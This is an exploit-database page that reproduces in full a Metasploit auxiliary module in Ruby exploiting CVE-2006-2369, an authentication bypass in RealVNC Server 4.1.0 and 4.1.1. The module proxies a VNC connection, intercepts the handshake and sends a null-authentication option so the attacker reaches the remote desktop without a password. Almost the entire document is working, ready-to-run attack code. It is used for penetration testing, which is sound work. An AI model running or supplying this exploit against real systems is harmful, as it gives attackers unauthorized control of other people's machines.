RealVNC Authentication Bypass



EKU-ID: 884 CVE: 2006-2369 OSVDB-ID: 25479
Author: hdm Published: 2011-08-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 
 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'RealVNC Authentication Bypass',
   'Description'    => %q{
    This module exploits an Authentication Bypass Vulnerability
    in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
    listener on LPORT and proxies to the target server

    The AUTOVNC option requires that vncviewer be installed on
    the attacking machine. This option should be disabled for Pro
   },
   'Author'         =>
    [
     'hdm', #original msf2 module
     'TheLightCosine <thelightcosine[at]gmail.com>'
    ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 13641 $',
   'References'     =>
    [
     ['BID', '17978'],
     ['OSVDB', '25479'],
     ['URL', 'http://secunia.com/advisories/20107/'],
     ['CVE', 'CVE-2006-2369'],
    ],
   'DisclosureDate' => 'May 15 2006'))

  register_options(
   [
    OptAddress.new('RHOST', [true, 'The Target Host']),
    OptPort.new('RPORT',    [true, "The port the target VNC Server is listening on", 5900 ]),
    OptPort.new('LPORT',    [true, "The port the local VNC Proxy should listen on", 5900 ]),
    OptBool.new('AUTOVNC',  [true, "Automatically Launch vncviewer from this host", true])
   ], self.class)
 end

 def run
  #starts up the Listener Server
  print_status("starting listener")
  listener = Rex::Socket::TcpServer.create(
    'LocalHost' => '0.0.0.0',
    'LocalPort' => datastore['LPORT'],
    'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
   )

  #If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine
  #targetting the proxy listener.
  if (datastore['AUTOVNC'])
   unless (check_vncviewer())
    print_error("vncviewer does not appear to be installed, exiting!!!")
    return nil
   end
   print_status("Spawning viewer thread") 
   view = framework.threads.spawn("VncViewerWrapper", false) {
     system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
   }
  end

  #Establishes the connection between the viewier and the remote server
  client = listener.accept
  add_socket(client)

  s = Rex::Socket::Tcp.create(
    'PeerHost' => datastore['RHOST'],
    'PeerPort' => datastore['RPORT'],
    'Timeout' => 1
    )
  add_socket(s)
  serverhello = s.gets
  unless serverhello.include? "RFB 003.008"
   print_error("The VNCServer is not vulnerable")
   return
  end

  #MitM attack on the VNC Authentication Process
  client.puts(serverhello)
  clienthello = client.gets
  s.puts(clienthello)
  authmethods = s.recv(2)
  print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")
  client.write("\x01\x01")
  client.recv(1)
  s.write("\x01")
  s.recv(4)
  client.write("\x00\x00\x00\x00")

  #handles remaining proxy operations between the two sockets
  closed = false
  while(closed == false)
   sockets =[]
   sockets << client
   sockets << s
   selected = select(sockets,nil,nil,0)
   #print_status ("Selected: #{selected.inspect}")
   unless selected.nil?
    if selected[0].include?(client)
     #print_status("Transfering from client to server")
     begin
      data = client.sysread(8192)
      if data.nil?
       print_error("Client Closed Connection")
       closed = true
      else
       s.write(data)
      end
     rescue
      print_error("Client Closed Connection") 
      closed = true
     end
    end
    if selected[0].include?(s)
     #print_status("Transfering from server to client")
     begin
      data = s.sysread(8192)
      if data.nil?
       print_error("Server Closed Connection")
       closed = true
      else
       client.write(data)
      end
     rescue
      closed = true
     end
    end
   end
  end

  #Garbage Collection
  s.close
  client.close
  print_status("Listener Closed")

  if (datastore['AUTOVNC'])
   view.kill
   print_status("Viewer Closed")
  end
 end

 def check_vncviewer
  vnc =
   Rex::FileUtils::find_full_path('vncviewer') ||
   Rex::FileUtils::find_full_path('vncviewer.exe')
  if (vnc)
   return true
  else
   return false
  end
 end
end